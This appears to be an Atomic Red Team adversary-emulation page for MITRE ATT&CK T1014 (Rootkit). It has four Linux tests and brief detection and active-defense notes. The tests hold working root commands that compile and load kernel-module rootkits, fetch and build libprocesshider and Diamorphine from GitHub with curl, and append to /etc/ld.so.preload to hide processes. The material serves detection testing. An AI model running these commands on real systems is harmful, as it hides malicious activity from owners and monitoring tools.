# T1014 - Rootkit
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)

## Atomic Tests

### Atomic Test #1 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)

##### Check Prereq Commands:
```sh
if [ -f PathToAtomicsFolder/T1014/bin/T1014.ko ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; fi;
cp PathToAtomicsFolder/T1014/src/Linux/* /tmp/T1014/
cd /tmp/T1014; make
mkdir PathToAtomicsFolder/T1014/bin
mv /tmp/T1014/T1014.ko PathToAtomicsFolder/T1014/bin/T1014.ko
rm -rf /tmp/T1014

```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
sudo insmod PathToAtomicsFolder/T1014/bin/T1014.ko
```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 1

#### Cleanup: 
```sh
sudo rmmod T1014
sudo rm -rf PathToAtomicsFolder/T1014/bin
```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)

##### Check Prereq Commands:
```sh
if [ -f /lib/modules/$(uname -r)/T1014.ko ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;
cp PathToAtomicsFolder/T1014/src/Linux/* /tmp/T1014
cd /tmp/T1014; make        
sudo cp /tmp/T1014/T1014.ko /lib/modules/$(uname -r)/
[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014
sudo depmod -a

```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
sudo modprobe T1014
```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 2

#### Cleanup: 
```sh
sudo modprobe -r T1014
sudo rm /lib/modules/$(uname -r)/T1014.ko
sudo depmod -a
```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 2 -Cleanup

### Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: The preload library must exist on disk at specified location (#{library_path})

##### Check Prereq Commands:
```sh
if [ -f /usr/local/lib/libprocesshider.so ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO https://github.com/gianlucaborello/libprocesshider//archive/25e0587d6bf2137f8792dc83242b6b0e5a72b415.zip && unzip 25e0587d6bf2137f8792dc83242b6b0e5a72b415.zip && cd libprocesshider-25e0587d6bf2137f8792dc83242b6b0e5a72b415
make
cp libprocesshider.so /usr/local/lib/libprocesshider.so
cp /usr/bin/ping /usr/local/bin/evil_script.py

```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
echo /usr/local/lib/libprocesshider.so | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 3

#### Cleanup: 
```sh
sed -i "\:^/usr/local/lib/libprocesshider.so:d" /etc/ld.so.preload
rm -rf /usr/local/lib/libprocesshider.so /usr/local/bin/evil_script.py /tmp/atomic
```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
Loads Diamorphine kernel module, which hides itself and a processes.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)

##### Check Prereq Commands:
```sh
if [ -f /lib/modules/$(uname -r)/diamorphine.ko ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO https://github.com/m0nad/Diamorphine//archive/898810523aa2033f582a4a5903ffe453334044f9.zip && unzip 898810523aa2033f582a4a5903ffe453334044f9.zip && cd Diamorphine-898810523aa2033f582a4a5903ffe453334044f9
make
sudo cp diamorphine.ko /lib/modules/$(uname -r)/
sudo depmod -a

```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
sudo modprobe diamorphine
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"
```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 4

#### Cleanup: 
```sh
kill -63 1
sudo modprobe -r diamorphine
sudo rm -rf /lib/modules/$(uname -r)/diamorphine.ko /tmp/atomic
sudo depmod -a
```

In [ ]:
Invoke-AtomicTest T1014 -TestNumbers 4 -Cleanup

## Detection
Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)


## Shield Active Defense
### Admin Access 
 Modify a user's administrative privileges.
 

 Changing the target system to allow or disallow users to perform tasks requiring administrator level permissions gives the defender leverage in inhibiting or facilitating attacks.  The procedures for changing these permissions vary across different operating and software systems.
#### Opportunity
There is an opportunity to block an adversary's intended action and force them to reveal additional TTPs.
#### Use Case
A defender could remove admin access in an attempt to force an adversary to perform privilege escalation to install a rootkit.
#### Procedures
Remove an account's administrative access from a system or service to require an adversary to reveal techniques for elevating privileges in order to accomplish certain tasks.
Grant an account administrative access to a system or service to enable an adversary to take advantage of those privileges if they compromise the system or service.
